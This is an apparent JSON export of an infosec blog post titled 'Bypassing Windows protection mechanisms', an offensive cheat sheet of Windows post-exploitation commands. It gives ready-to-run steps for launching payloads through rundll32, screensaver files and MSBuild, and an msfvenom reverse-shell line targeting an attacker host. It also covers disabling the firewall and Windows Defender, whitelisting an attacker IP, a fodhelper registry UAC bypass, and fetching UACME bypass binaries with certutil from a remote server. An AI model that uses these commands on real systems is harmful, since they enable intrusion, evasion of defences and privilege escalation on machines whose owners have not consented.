{"id":2233,"date":"2021-01-09T18:12:47","date_gmt":"2021-01-09T17:12:47","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=2233"},"modified":"2024-09-16T16:42:30","modified_gmt":"2024-09-16T14:42:30","slug":"bypassing-windows-protection-mechanisms","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=2233","title":{"rendered":"Bypassing Windows protection mechanisms"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Execution<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">If you can\u00adnot exe\u00adcute an exe file, try these options:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Exe\u00adcute a <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=2288\" data-type=\"post\" data-id=\"2288\"><span class=\"caps\">HTA<\/span> shell<\/a><\/li>\n\n\n\n<li>Exe\u00adcut it <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=2288\" data-type=\"post\" data-id=\"2288\">as a&nbsp;<span class=\"caps\">DLL<\/span><\/a>\n<ul class=\"wp-block-list\">\n<li><code>msfvenom -p windows\/exec -f dll CMD=calc.exe -o calc.dll<\/code><\/li>\n\n\n\n<li><code>C:\\rundll32.exe calc.dll,doesntmatterhere<\/code><\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Rename a .exe into a screen saver .src file and exe\u00adcute it via rundll:<br><code>copy payload.exe p.scr<br>C:\\Windows\\system32\\rundll32.exe desk.cpl,InstallScreenSaver p.scr<\/code><\/li>\n\n\n\n<li>Use nest\u00aded exe\u00adcu\u00adtions through trust\u00aded appli\u00adca\u00adtions:<br><code>C:\\payload.exe<br>C:\\Windows\\system32\\cmd.exe \/c C:\\payload.exe<br>C:\\Windows\\system32\\cmd.exe \/c cscript.exe \\windows\\system32\\SyncAppvPublishingServer.vbs \".;Start-Process rundll32.exe 'shell32.dll,ShellExec_RunDLL payload.exe'[ -Verb RunAs]\" \/\/ With the last argument, a UAC dialog pops up, but with blue color because the program to execute was signed by Microsoft.<\/code><\/li>\n\n\n\n<li>Try to exe\u00adcute (one-lin\u00ader) scripts which runs interepret\u00aded code or can cre\u00adate new processes.<\/li>\n\n\n\n<li>Use MSBuild.exe.\n<ol class=\"wp-block-list\">\n<li><a href=\"https:\/\/andreas-klingler.de\/infosec\/wp-content\/uploads\/2020\/12\/msbuild_xml_template.txt\">Use this CSharp template.<\/a><\/li>\n\n\n\n<li>Add C# code in the code section.&nbsp;<ul class=\"wp-block-list\">\n<li>Or: <code>msfvenom -p windows\/shell_reverse_tcp LHOST=$attacker LPORT=80 -f csharp<\/code><\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Exe\u00adcute it on the tar\u00adget with msbuild.exe file.xml.<\/li>\n\n\n\n<li>Tip: Code could be down\u00adloaded remote\u00adly: <code>&lt;Code Type=\"Class\" Language=\"cs\" Source=\"\\10.10.10.10\\bla.cs&gt;<\/code><\/li>\n<\/ol>\n<\/li>\n\n\n\n<li><code>C:\\windows\\system32\\cmd.exe <\/code>is blocked? Try <code>C:\\windows\\SysWOW64\\cmd.exe<\/code> !<\/li>\n\n\n\n<li>Powershell.exe is blocked?&nbsp;<ul class=\"wp-block-list\">\n<li><code>C:\\Windows\\SysWOW64\\WindowsPowerShell\\...\\powershell.exe<\/code><\/li>\n\n\n\n<li><code>C:\\Windows\\sysnative\\WindowsPowerShell\\...\\powershell.exe<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Windows firewall \/&nbsp;netsh<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Check fire\u00adwall&nbsp;state<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">netsh advfirewall show currentprofile\nnetsh advfirewall show state<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">If the fire\u00adwall is active, list the configuration:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">netsh advfirewall show config<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Exam\u00adple how to add excep\u00adtions into the fire\u00adwall via the com\u00admand line from an administrator:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">C:\\Windows\\temp&gt; netsh advfirewall firewall add rule name=\"httptunnel_client\" dir=in action=allow program=\"httptunnel_client.exe\" enable=yes<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">or<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">Netsh Advfirewall show allprofiles\nNetSh Advfirewall set allprofiles state off<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"block-b63da25d-5168-4543-a090-ef0fd895b261\">or whitelist the own&nbsp;ip<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Open a&nbsp;port:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">netsh advfirewall firewall add rule name=\"port_forward_ssh_2222\" protocol=TCP dir=in localip=$localWindowsIp localport=2222 action=allow<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Windows Defender<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Detect if the Defend\u00ader is active:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>sc query windefend<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Deac\u00adti\u00advate Win\u00addows Defender:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">sc config WinDefend start= disabled\nsc stop WinDefend<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Same thing in PowerShell:<\/p>\n\n\n\n<pre id=\"block-5fedca49-9679-4b1c-b0da-3c721a86d02a\" class=\"wp-block-preformatted\">Get-MpComputerStatus\nSet-MpPreference -DisableRealtimeMonitoring $true\nSet-MpPreference -DisableIOAVProtection $true\nGet-MpComputerStatus<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"caps\">UAC<\/span> User Account Control<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=3383\" data-type=\"post\" data-id=\"3383\">See Win\u00addows secu\u00adri\u00adty fun\u00adda\u00admen\u00adtels for more information<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Anoth\u00ader <span class=\"caps\">UAC<\/span> bypass with fodhelper.exe. In a (admin) cmd:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Add an emp\u00adty key which will fod\u00adhelper bring to go to an alter\u00adna\u00adtive key (the next one).<br><code>REG ADD HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command \/v DelegateExecute \/t REG_SZ<\/code><\/li>\n\n\n\n<li>Set reg\u00adistry key which fod\u00adhelper exe will access as alter\u00adna\u00adtive.<br><code>REG ADD HKCU\\Software\\Classes\\ms-settings\\Shell\\Open\\command \/d \"cmd.exe\" \/f<\/code><\/li>\n\n\n\n<li>Open C:\\Windows\\System32\\fodhelper.exe<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"caps\">UACME<\/span><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/github.com\/hfiref0x\/UACME\">Github<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">~70 meth\u00adods to bypass <span class=\"caps\">UAC<\/span> in a sin\u00adgle bina\u00adry. Check it out direct\u00adly in Visu\u00adal Stu\u00addio. Remove the macro <code>#KUMA_STUB<\/code> in <em>global.h<\/em>. Then, build&nbsp;it.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">certutil.exe -urlcache -split -f \"http:\/\/$NTPSRV\/Akagi32.exe\" Akagi32.exe<br>Akagi32.exe 31 cmd.exe<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">certutil.exe -urlcache -split -f \"http:\/\/$NTPSRV\/Akagi64.exe\" Akagi64.exe<br>Akagi64.exe 61 cmd.exe<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Try var\u00adi\u00adous IDs. The Github page has a (col\u00adlapsed) list of all bypass\u00ading methods.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"caps\">SDCLC<\/span> bypass<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Open a ses\u00adsion in meter\u00adpreter. Back\u00adground the session.<\/li>\n\n\n\n<li>Use windows\/local\/bypassuac_sdclt and set the back\u00adground\u00aded ses\u00adsion and run the bypass.<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Exe\u00adcu\u00adtion If you can\u00adnot exe\u00adcute an exe file, try these options: Win\u00addows fire\u00adwall \/&nbsp;netsh Check fire\u00adwall&nbsp;state netsh adv\u00adfire\u00adwall show cur\u00adrent\u00adpro\u00adfile netsh adv\u00adfire\u00adwall show state If the fire\u00adwall is active, list the con\u00adfig\u00adu\u00adra\u00adtion: netsh adv\u00adfire\u00adwall show con\u00adfig Exam\u00adple how to add excep\u00adtions into the fire\u00adwall via the com\u00admand line from an admin\u00adis\u00adtra\u00adtor: C:\\Windows\\temp&gt; netsh adv\u00adfire\u00adwall firewall&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[471,472],"tags":[53,24],"class_list":["post-2233","post","type-post","status-publish","format-standard","hentry","category-privesc","category-postexp","tag-privilege-escalation","tag-windows"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2233","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2233"}],"version-history":[{"count":20,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2233\/revisions"}],"predecessor-version":[{"id":4442,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2233\/revisions\/4442"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2233"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2233"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2233"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}